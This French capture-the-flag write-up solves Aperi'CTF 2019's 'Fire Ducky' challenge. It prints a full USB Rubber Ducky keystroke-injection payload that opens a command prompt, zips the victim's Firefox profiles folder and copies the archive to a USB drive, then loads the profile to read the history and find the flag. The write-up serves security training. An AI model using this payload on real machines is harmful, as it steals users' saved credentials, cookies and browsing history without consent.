Zeecka zeecka

Fire Ducky

Aperi'CTF 2019 - Physical (175 pts)

Aperi’CTF 2019 - Fire Ducky

Détails du challenge

EventChallengeCategoryPointsSolves
Aperi’CTF 2019Fire DuckyPhysique175???

L’utilisateur du PC ducky semble avoir une activité suspecte sur son navigateur. Investiguez. L’exfiltration des données peut se faire à l’aide d’une clé USB classique (montage D:// par default) uniquement. Le flag respecte le format APRK{…}.

TL;DR

Dump du profil Mozilla FireFox avec le Rubber Ducky et 7z : 7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles

Méthodologie

D’après le nom du challenge, le navigateur devrait être FireFox. Pour mener l’investigation, nous allons dumper le profil Firefox. Par défaut, le profil FireFox se situe à l’emplacement suivant : %AppData%\Mozilla\Firefox\Profiles.

Étant donné que les profils FireFox sont des dossiers, nous allons utiliser la commande 7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles pour créer un fichier zip du dossier contenant les profils. Nous allons créer le fichier d’archive dans %Temp% puis le déplacer vers D:\\.

Voici le payload ducky final (notez la pause due à la compression zip) :

DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING cd %Temp%
ENTER
DELAY 1000
STRING 7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles
ENTER
DELAY 30000
STRING xcopy "mysecretprofile.zip" "D:\"
ENTER

Ensuite, nous débranchons les deux clés et investiguons sur mysecretprofile.zip. Pour cela, j’ai décidé de charger le profil. Collez le dossier v0t6ebj3.default-release dans votre dossier de profils (sur debian : ~/.mozilla/firefox). Fermez ensuite Firefox, éditez profiles.ini (conservez une copie du fichier profiles.ini original) :

[Profile0]
Name=Ducky
IsRelative=1
Path=v0t6ebj3.default-release
Default=1

Lancez Firefox :

profile.png

Regardez ensuite l’historique :

history.png

Flag

APRK{Rubb3r_C0o0o0oK!E}

Zeecka